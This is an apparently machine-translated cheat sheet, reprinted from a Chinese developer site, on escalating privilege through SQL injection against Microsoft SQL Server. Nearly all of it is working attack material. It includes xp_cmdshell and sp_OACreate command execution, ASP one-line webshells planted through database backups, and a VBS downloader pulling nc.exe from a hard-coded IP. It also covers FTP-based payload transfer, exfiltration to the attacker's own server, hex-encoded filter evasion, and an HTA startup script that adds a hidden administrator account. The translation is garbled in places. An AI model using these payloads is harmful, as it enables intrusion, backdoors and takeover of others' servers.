Methods for Elevation of Privilege in MSSQL Injection

Ideas for Elevation of Privilege in MSSQL injection:
SA permission: directly elevation of permissions in stored procedures such as xp_mongoshell and Sp_OACreate. (The prerequisite is stored in the stored procedure)
Related SQL statements
XP_CMDSHELL:
Numeric type; exec master. DBO. XP_CMDSHELL 'cmdline '--
Type & search type '; exec master. DBO. XP_CMDSHELL 'cmdline '--
Sp_OACreate:
Number type; declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c:/windows/system32/cmd.exe/c cmdline '--
Type & search type '; declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c:/windows/system32/cmd.exe/c cmdline '--
P.s. (Change WINDOWS to WINNT in the 2000 System)

Sand Table elevation:
Enable sandbox mode. exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Jet/4.0/Engines', 'sandboxmode', 'reg _ dword', 1 --
Then use jet. oledb executes the system command; select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c:/windows/system32/ias. mdb ', 'select shell ("cmd.exe/c cmdline ")')--
P.s. (Change WINDOWS to WINNT in the 2000 System)

Back up a single-statement Trojan directly; exec sp_makewebtask 'absolute WEB path/fuck. asp ', 'select' <% 25 execute (request ("a") % 25> ''';--
P.S. (The WEB and DATA are on the same host and know the WEB directory)

How to download files to the target host:
Use tools such as NBSI to write VBS files
Echo Set xPost = CreateObject (^ "Microsoft. XMLHTTP ^ "): xPost. open ^ "GET ^", ^ "http: // 125.113.114.49/nc.exe ^", 0: xPost. send (): Set sGet = CreateObject (^ "ADODB. stream ^ "): sGet. mode = 3: sGet. type = 1: sGet. open (): sGet. write (xPost. responseBody): sGet. saveToFile ^ "c:/c.exe ^", 2> c:/labeng. vbs
Purpose of this statement: Write a vbs file named labeng to drive C;
Then run the cscript c:/LABENG. VBS; VBS file: Download http: // 125.113.114.49/nc.exe to C:/C. EXE;

FTP & TFTP transmission:
FTP:
Line
Echo ftp> FTP. TXT
Echo open 125. *> FTP. TXT
Echo username> FTP. TXT
Echio password> FTP. TXT
Echo get xx. EXE> FTP. TXT
Echo bye> FTP. TXT
Purpose: Write an FTP. TXT file with the content
FTP
OPEN 125 .*.*.*
USERNAME
PASSWORD
Get xx. EXE
BYE
Then execute FTP-S: FTP. TXT. The target host will go to 125. * to download XX. EXE;
TFTP is similar ~~

DB permission:
WEB & DATA on the same host: 1. Find the WEB directory in the column, take WEBSHELL for LOG or differential backup, and then escalate the permission. 2. Guess the table and take the administrator ID and password, get WEBSHELL in the background .. 3. Back up the Privilege Escalation statement to the startup Item and wait for the restart.
Separation: 1. Take the administrator ID and password in the table and take WEBSHELL... 2 in the background. Back up the Privilege Escalation statement to the startup Item and wait for the restart.

Determine the IP address of the DATA Host:
Local NC-L-V-P 1433 listens to port 1433
; Insert into opendatasource ('sqloledb', 'server = your own IP address; uid = test; pwd = test; database = test '). test. dbo. ku select name from master. dbo. sysdatabases --

Brute-force WEB path (PS: DATA & WEB same host)
; Create table labeng (lala nvarchar (255), null )--
; DECLARE @ result varchar (255) EXEC master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System/ControlSet001/Services/W3SVC/Parameters/Virtual Roots', '/', @ result output insert into labeng (lala) values (@ result );--
; And 1 = (select count (*) from labeng where lala> 1) -- or; and 1 = (selet top 1 lala from labeng )--

Filter processing:
; DECLARE @ s varchar (4000); SET @ S = CAST (hexadecimal number of SQL statements AS VARCHAR (4000); EXEC (@ S )--

LOG backup statement:
; Alter database table set recovery full --
; Create table cmd (a image )--
; Backup log table to disk = 'C:/sammy' with init --
; Insert into cmd (a) values ('<% 25 Execute (request ("value") % 25> ')--
; Backup log table to disk = 'web directory/1. asp '--

One sentence Deformation:
A). <% 25 Execute (request ("go") % 25>
B). <% Execute (request ("go") %>
C). %> <% execute request ("go") %> <%
D). <script language = VBScript runat = server> execute request ("sb") </Script>
E). <% 25 Execute (request ("l") % 25>

Backup file to startup Item:
Change '<% 25 Execute (request ("value") % 25>' in LOG backup to the hexadecimal content of files such as HTA. BAT.

Example: labeng. hta
Content:
<Script language = "VBScript">
On error resume next
Set WS = createobject ("WScript. Shell ")
WS. run "cmd/c net1.exe user test $ labeng? 123/add & net1.exe localgroup
Administrators test $/add & del labeng. hta ", 0
</Script> <script language = javascript> window. close (); </script>
-----------------------------------------------------------------------------
Convert to hexadecimal:
Bytes
-----------------------------------------------------------------------------
SQL statement:
; Insert into cmd (a) values (values )--

Bytes ------------------------------------------------------------------------------------
Improve SQL user permissions to SA:
<Script language = "VBScript">
On error resume next
Set WS = createobject ("WScript. Shell ")
WS. run "cmd/c echo exec master. dbo. sp_addsrvrolemember
Boayo, sysadmin> c:/test. qry & isql-E/U alma/P/I c:/test. qry & del
Labeng. hta ", 0
</Script> <script language = javascript> window. close (); </script>
Usage is the same as above...

 

Reprinted from csdn